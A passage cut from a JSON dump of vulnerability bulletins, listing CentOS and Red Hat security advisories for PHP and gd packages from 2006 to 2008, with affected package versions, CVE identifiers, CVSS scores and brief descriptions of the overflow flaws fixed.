"php-odbc", "packageFilename": "php-odbc-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-snmp", "packageFilename": "php-snmp-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-gd", "packageFilename": "php-gd-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "i386", "packageName": "php-odbc", "packageFilename": "php-odbc-4.3.2-37.ent.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390x", "packageName": "php-snmp", "packageFilename": "php-snmp-4.3.9-3.22.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-imap", "packageFilename": "php-imap-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-gd", "packageFilename": "php-gd-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.2-37.ent.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "x86_64", "packageName": "php", "packageFilename": "php-4.3.2-37.ent.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-gd", "packageFilename": "php-gd-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390", "packageName": "php", "packageFilename": "php-4.3.2-37.ent.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php-imap", "packageFilename": "php-imap-4.3.2-37.ent.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-snmp", "packageFilename": "php-snmp-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-snmp", "packageFilename": "php-snmp-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "i386", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.2-37.ent.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-mysql", "packageFilename": "php-mysql-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "i386", "packageName": "php", "packageFilename": "php-4.3.2-37.ent.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-37.ent", "arch": "x86_64", "packageName": "php-devel", "packageFilename": "php-devel-4.3.2-37.ent.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-ldap", "packageFilename": "php-ldap-4.3.9-3.22.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-domxml", "packageFilename": "php-domxml-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "s390", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.9-3.22.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "ia64", "packageName": "php-ncurses", "packageFilename": "php-ncurses-4.3.9-3.22.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageName": "php-mbstring", "packageFilename": "php-mbstring-4.3.9-3.22.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.9-3.22.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0730\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities()\r\nand htmlspecialchars() routines. If a PHP script used the vulnerable\r\nfunctions to parse UTF-8 data, a remote attacker sending a carefully\r\ncrafted request could trigger the overflow and potentially execute\r\narbitrary code as the 'apache' user. (CVE-2006-5465) \r\n\r\nUsers of PHP should upgrade to these updated packages which contain a\r\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013349.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013350.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013351.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013352.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013353.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013354.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013389.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-November/013390.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0730.html", "edition": 2, "reporter": "CentOS Project", "published": "2006-11-07T10:23:30", "title": "php security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-5465"], "modified": "2006-11-09T22:03:43", "href": "http://lists.centos.org/pipermail/centos-announce/2006-November/013349.html", "id": "CESA-2006:0730", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T14:45:19", "references": ["http://pasi.pirhonen.eu/", "https://rhn.redhat.com/errata/RHSA-2008-0146.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "ia64", "packageName": "gd-progs", "packageFilename": "gd-progs-2.0.28-5.4E.c4.1.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "any", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "any", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "s390x", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.28-5.4E.c4.1.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageName": "gd", "packageFilename": "gd-2.0.33-9.4.el5_1.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageName": "gd", "packageFilename": "gd-2.0.33-9.4.el5_1.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "x86_64", "packageName": "gd-progs", "packageFilename": "gd-progs-2.0.28-5.4E.el4_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "x86_64", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.28-5.4E.el4_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "s390", "packageName": "gd-progs", "packageFilename": "gd-progs-2.0.28-5.4E.c4.1.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "ia64", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.28-5.4E.c4.1.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "ia64", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.c4.1.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "x86_64", "packageName": "gd", "packageFilename": "gd-2.0.33-9.4.el5_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageName": "gd-progs", "packageFilename": "gd-progs-2.0.28-5.4E.el4_6.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "x86_64", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageName": "gd-progs", "packageFilename": "gd-progs-2.0.33-9.4.el5_1.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "x86_64", "packageName": "gd-progs", "packageFilename": "gd-progs-2.0.33-9.4.el5_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "s390x", "packageName": "gd-progs", "packageFilename": "gd-progs-2.0.28-5.4E.c4.1.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.33-9.4.el5_1.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.33-9.4.el5_1.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.28-5.4E.el4_6.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "s390", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.c4.1.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "any", "packageName": "gd", "packageFilename": "gd-2.0.33-9.4.el5_1.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "any", "packageName": "gd", "packageFilename": "gd-2.0.33-9.4.el5_1.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "x86_64", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.33-9.4.el5_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "s390", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.28-5.4E.c4.1.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.c4.1", "arch": "s390x", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.c4.1.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageName": "gd", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2008:0146\n\n\nThe gd package contains a graphics library used for the dynamic creation of\r\nimages such as PNG and JPEG.\r\n\r\nMultiple issues were discovered in the gd GIF image-handling code. A\r\ncarefully-crafted GIF file could cause a crash or possibly execute code\r\nwith the privileges of the application using the gd library.\r\n(CVE-2006-4484, CVE-2007-3475, CVE-2007-3476)\r\n\r\nAn integer overflow was discovered in the gdImageCreateTrueColor()\r\nfunction, leading to incorrect memory allocations. A carefully crafted\r\nimage could cause a crash or possibly execute code with the privileges of\r\nthe application using the gd library. (CVE-2007-3472)\r\n\r\nA buffer over-read flaw was discovered. This could cause a crash in an\r\napplication using the gd library to render certain strings using a\r\nJIS-encoded font. (CVE-2007-0455)\r\n\r\nA flaw was discovered in the gd PNG image handling code. A truncated PNG\r\nimage could cause an infinite loop in an application using the gd library.\r\n(CVE-2007-2756)\r\n\r\nA flaw was discovered in the gd X BitMap (XBM) image-handling code. A\r\nmalformed or truncated XBM image could cause a crash in an application\r\nusing the gd library. (CVE-2007-3473)\r\n\r\nUsers of gd should upgrade to these updated packages, which contain\r\nbackported patches which resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/014724.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/014729.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/014732.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/014733.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-March/014738.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-March/014739.html\n\n**Affected packages:**\ngd\ngd-devel\ngd-progs\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0146.html", "edition": 2, "reporter": "CentOS Project", "published": "2008-02-28T19:35:25", "title": "gd security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4484", "CVE-2007-3476", "CVE-2007-2756", "CVE-2007-3472", "CVE-2007-3475", "CVE-2007-0455", "CVE-2007-3473"], "modified": "2008-03-03T19:08:13", "href": "http://lists.centos.org/pipermail/centos-announce/2008-February/014724.html", "id": "CESA-2008:0146", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:45:58", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.9-3.18", "arch": "i386", "packageName": "php", "packageFilename": "php-4.3.9-3.18.i386.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA response-splitting issue was discovered in the PHP session handling. If\r\na remote attacker can force a carefully crafted session identifier to be\r\nused, a cross-site-scripting or response-splitting attack could be\r\npossible. (CVE-2006-3016)\r\n\r\nA buffer overflow was discovered in the PHP sscanf() function. If a script\r\nused the sscanf() function with positional arguments in the format string,\r\na remote attacker sending a carefully crafted request could execute\r\narbitrary code as the 'apache' user. (CVE-2006-4020)\r\n\r\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat()\r\nfunctions. If a script running on a 64-bit server used either of these\r\nfunctions on untrusted user data, a remote attacker sending a carefully\r\ncrafted request might be able to cause a heap overflow. (CVE-2006-4482)\r\n\r\nA buffer overflow was discovered in the PHP gd extension. If a script was\r\nset up to process GIF images from untrusted sources using the gd extension,\r\na remote attacker could cause a heap overflow. (CVE-2006-4484)\r\n\r\nAn integer overflow was discovered in the PHP memory allocation handling. \r\nOn 64-bit platforms, the \"memory_limit\" setting was not enforced correctly,\r\nwhich could allow a denial of service attack by a remote user. (CVE-2006-4486)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues. These packages also contain a\r\nfix for a bug where certain input strings to the metaphone() function could\r\ncause memory corruption.", "reporter": "RedHat", "published": "2006-09-21T04:00:00", "type": "redhat", "title": "(RHSA-2006:0669) php security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-3016", "CVE-2006-4020", "CVE-2006-4482", "CVE-2006-4484", "CVE-2006-4486"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:06", "id": "RHSA-2006:0669", "href": "https://access.redhat.com/errata/RHSA-2006:0669", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:54", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.1.2-2.11", "arch": "i386", "packageName": "php-ldap", "packageFilename": "php-ldap-4.1.2-2.11.i386.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA response-splitting issue was discovered in the PHP session handling. If\r\na remote attacker can force a carefully crafted session identifier to be\r\nused, a cross-site-scripting or response-splitting attack could be\r\npossible. (CVE-2006-3016)\r\n\r\nA buffer overflow was discovered found in the PHP sscanf() function. If a\r\nscript used the sscanf() function with positional arguments in the format\r\nstring, a remote attacker sending a carefully crafted request could execute\r\narbitrary code as the 'apache' user. (CVE-2006-4020)\r\n\r\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat()\r\nfunctions. If a script running on a 64-bit server used either of these\r\nfunctions on untrusted user data, a remote attacker sending a carefully\r\ncrafted request might be able to cause a heap overflow. (CVE-2006-4482)\r\n\r\nAn integer overflow was discovered in the PHP memory allocation handling. \r\nOn 64-bit platforms, the \"memory_limit\" setting was not enforced correctly,\r\nwhich could allow a denial of service attack by a remote user. (CVE-2006-4486)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues. These packages also contain a\r\nfix for a bug where certain input strings to the metaphone() function could\r\ncause memory corruption.", "reporter": "RedHat", "published": "2006-09-21T04:00:00", "type": "redhat", "title": "(RHSA-2006:0682) php security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-3016", "CVE-2006-4020", "CVE-2006-4482", "CVE-2006-4486"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-03-14T19:27:06", "id": "RHSA-2006:0682", "href": "https://access.redhat.com/errata/RHSA-2006:0682", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:36", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "5.1.4-1.el4s1.4", "arch": "i386", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.1.4-1.el4s1.4.i386.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nAn integer overflow was discovered in the PHP memory handling routines. If\r\na script can cause memory allocation based on untrusted user data, a remote\r\nattacker sending a carefully crafted request could execute arbitrary code\r\nas the 'apache' user. (CVE-2006-4812)\r\n\r\nA buffer overflow was discovered in the PHP sscanf() function. If a script\r\nused the sscanf() function with positional arguments in the format string,\r\na remote attacker sending a carefully crafted request could execute\r\narbitrary code as the 'apache' user. (CVE-2006-4020)\r\n\r\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat()\r\nfunctions. If a script running on a 64-bit server used either of these\r\nfunctions on untrusted user data, a remote attacker sending a carefully\r\ncrafted request might be able to cause a heap overflow. (CVE-2006-4482)\r\n\r\nA buffer overflow was discovered in the PHP gd extension. If a script was\r\nset up to process GIF images from untrusted sources using the gd extension,\r\na remote attacker could cause a heap overflow. (CVE-2006-4484)\r\n\r\nA buffer overread was discovered in the PHP stripos() function. If a\r\nscript used the stripos() function with untrusted user data, PHP may read\r\npast the end of a buffer, which could allow a denial of service attack by a\r\nremote user. (CVE-2006-4485)\r\n\r\nAn integer overflow was discovered in the PHP memory allocation handling. \r\nOn 64-bit platforms, the \"memory_limit\" setting was not enforced correctly,\r\nwhich could allow a denial of service attack by a remote user. (CVE-2006-4486)\r\n\r\nThese packages also contain a fix for a bug where certain input strings to\r\nthe metaphone() function could cause memory corruption.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.", "reporter": "RedHat", "published": "2006-10-05T04:00:00", "type": "redhat", "title": "(RHSA-2006:0688) php security update", "enchantments": {"score": {"modified": "2018-12-11T17:42:36", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4020", "CVE-2006-4482", "CVE-2006-4484", "CVE-2006-4485", "CVE-2006-4486", "CVE-2006-4812"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-03T23:41:45", "id": "RHSA-2006:0688", "href": "https://access.redhat.com/errata/RHSA-2006:0688", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:57", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-37.ent", "arch": "s390x", "packageName": "php-pgsql", "packageFilename": "php-pgsql-4.3.2-37.ent.s390x.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities()\r\nand htmlspecialchars() routines. If a PHP script used the vulnerable\r\nfunctions to parse UTF-8 data, a remote attacker sending a carefully\r\ncrafted request could trigger the overflow and potentially execute\r\narbitrary code as the 'apache' user. (CVE-2006-5465) \r\n\r\nUsers of PHP should upgrade to these updated packages which contain a\r\nbackported patch to correct this issue.", "reporter": "RedHat", "published": "2006-11-06T05:00:00", "type": "redhat", "title": "(RHSA-2006:0730) php security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-5465"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-11T23:26:53", "id": "RHSA-2006:0730", "href": "https://access.redhat.com/errata/RHSA-2006:0730", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:41:50", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "5.1.4-1.el4s1.5", "arch": "i386", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.1.4-1.el4s1.5.i386.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities()\r\nand htmlspecialchars() routines. If a PHP script used the vulnerable\r\nfunctions to parse UTF-8 data, a remote attacker sending a carefully\r\ncrafted request could trigger the overflow and potentially execute\r\narbitrary code as the 'apache' user. (CVE-2006-5465) \r\n\r\nUsers of PHP should upgrade to these updated packages which contain a\r\nbackported patch to correct this issue.", "reporter": "RedHat", "published": "2006-11-10T05:00:00", "type": "redhat", "title": "(RHSA-2006:0731) Important: php security update", "enchantments": {"score": {"modified": "2018-12-11T17:41:50", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-5465"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-03T23:41:40", "id": "RHSA-2006:0731", "href": "https://access.redhat.com/errata/RHSA-2006:0731", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:42:45", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "ppc", "packageName": "gd-devel", "packageFilename": "gd-devel-2.0.28-5.4E.el4_6.1.ppc.rpm", "operator": "lt"}], "description": "The gd package contains a graphics library used for the dynamic creation of\r\nimages such as PNG and JPEG.\r\n\r\nMultiple issues were discovered in the gd GIF image-handling code. A\r\ncarefully-crafted GIF file could cause a crash or possibly execute code\r\nwith the privileges of the application using the gd library.\r\n(CVE-2006-4484, CVE-2007-3475, CVE-2007-3476)\r\n\r\nAn integer overflow was discovered in the gdImageCreateTrueColor()\r\nfunction, leading to incorrect memory allocations. A carefully crafted\r\nimage could cause a crash or possibly execute code with the privileges of\r\nthe application using the gd library. (CVE-2007-3472)\r\n\r\nA buffer over-read flaw was discovered. This could cause a crash in an\r\napplication using the gd library to render certain strings using a\r\nJIS-encoded font. (CVE-2007-0455)\r\n\r\nA flaw was discovered in the gd PNG image handling code. A truncated PNG\r\nimage could cause an infinite loop in an application using the gd library.\r\n(CVE-2007-2756)\r\n\r\nA flaw was discovered in the gd X BitMap (XBM) image-handling code. A\r\nmalformed or truncated XBM image could cause a crash in an application\r\nusing the gd library. (CVE-2007-3473)\r\n\r\nUsers of gd should upgrade to these updated packages, which contain\r\nbackported patches which resolve these issues.", "reporter": "RedHat", "published": "2008-02-28T05:00:00", "type": "redhat", "title": "(RHSA-2008:0146) Moderate: gd security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4484", "CVE-2007-0455", "CVE-2007-2756", "CVE-2007-3472", "CVE-2007-3473", "CVE-2007-3475", "CVE-2007-3476"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:57:01", "id": "RHSA-2008:0146", "href": "https://access.redhat.com/errata/RHSA-2008:0146", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-11-17T06:49:48", "references": ["https://access.redhat.com/security/cve/cve-2006-4486", "https://access.redhat.com/security/cve/cve-2006-4484", "https://access.redhat.com/security/cve/cve-2006-3016", "https://access.redhat.com/security/cve/cve-2006-4482", "https://access.redhat.com/security/cve/cve-2006-4020", "https://access.redhat.com/errata/RHSA-2006:0669"], "pluginID": "22443", "description": "Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption.", "edition": 8, "reporter": "Tenable", "published": "2006-09-22T00:00:00", "title": "RHEL 3 / 4 : php (RHSA-2006:0669)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": 